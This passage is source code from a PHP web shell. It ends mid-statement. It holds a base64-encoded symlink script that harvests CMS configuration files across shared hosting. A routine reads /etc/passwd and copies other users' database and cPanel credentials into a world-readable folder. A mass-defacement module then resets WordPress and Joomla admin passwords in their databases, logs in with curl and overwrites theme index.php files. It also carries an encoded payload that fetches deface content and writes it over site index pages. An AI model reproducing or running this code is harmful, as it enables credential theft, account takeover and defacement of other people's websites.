luaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy10cmFpZG50MS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00aW1hZ2VzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmdzLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcmVxdWlyZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLUFNNFNTLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2xva29tZWRpYS9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wby1jb250ZW50L2NvbmZpZy5waHAnLCRzaXRlc3MsJy1wb3BvamkudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92ZG9fY29uZmlnLnBocCcsJHNpdGVzcywnLVZvb2Rvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2J3X2NvbmZpZy9jb25maWcuaW5pJywkc2l0ZXNzLCctYm9zd2ViLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYndfY29uZmlnL2NvbmZpZy5pbmknLCRzaXRlc3MsJy1ib3N3ZWIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYXRhYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9rb2ZpZ3VyYXNpL2tvbmVrc2kucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmYvY29uZi5waHAnLCRzaXRlc3MsJy11bmtub3duLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2V0ZGF0YWJhc2UucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2RiL3NldGRhdGFiYXNlLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7Cn0KcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J2VjYm9zcy8nIHN0eWxlPSdjb2xvcjojMDBGRkZGJz5Eb25lIHwgQ2xpY2sgSGVyZSAhPC9mb250PiI7Cg==';
743$file = fopen("ecini.ler" ,"w+");
744$write = fwrite ($file ,base64_decode($config));
745fclose($file);
746 chmod("ecini.ler",0755);
747 echo "<center><a href='ecboss/ecini.ler'>Click Here !</a></center>";
748} elseif($_GET['do'] == 'config') {
749 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
750 $idx = mkdir("ec_config", 0777);
751 $isi_htc = "Options all\nRequire None\nSatisfy Any";
752 $htc = fopen("ec_config/.htaccess","w");
753 fwrite($htc, $isi_htc);
754 while($passwd = fgets($etc)) {
755 if($passwd == "" || !$etc) {
756 echo "<font color=red>Can't read /etc/passwd</font>";
757 } else {
758 preg_match_all('/(.*?):x:/', $passwd, $user_config);
759 foreach($user_config[1] as $user_idx) {
760 $user_config_dir = "/home/$user_idx/public_html/";
761 if(is_readable($user_config_dir)) {
762 $grab_config = array(
763 "/home/$user_idx/.my.cnf" => "cpanel",
764 "/home/$user_idx/.accesshash" => "WHM-accesshash",
765 "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
766 "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
767 "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
768 "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
769 "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
770 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
771 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
772 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
773 "/home/$user_idx/public_html/forum/config.php" => "phpBB",
774 "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
775 "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
776 "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
777 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
778 "/home/$user_idx/public_html/configuration.php" => "Joomla",
779 "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
780 "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
781 "/home/$user_idx/public_html/wp-config.php" => "WordPress",
782 "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
783 "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
784 "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
785 "/home/$user_idx/public_html/db/db.php" => "Unknown",
786 "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
787 "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
788 "/home/$user_idx/public_html/database/db.php" => "Unknown",
789 "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
790 "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
791 "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
792 "/home/$user_idx/public_html/db/config.php" => "Unknown",
793 "/home/$user_idx/public_html/db/database.php" => "Unknown",
794 "/home/$user_idx/public_html/database/config.php" => "Unknown",
795 "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
796 "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
797 "/home/$user_idx/public_html/konfigurasi/db.php" => "Unknown",
798 "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown");
799 foreach($grab_config as $config => $nama_config) {
800 $ambil_config = file_get_contents($config);
801 if($ambil_config == '') {
802 } else {
803 $file_config = fopen("ec_config/$user_idx-$nama_config.txt","w");
804 fputs($file_config,$ambil_config);
805 }
806 }
807 }
808 }
809 }
810 }
811 echo "<center><a href='?cr0tz&folder=$dir/ec_config'><font color=lime>Done</font></a></center>";
812} elseif($_GET['do'] == 'boom') {
813 {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = 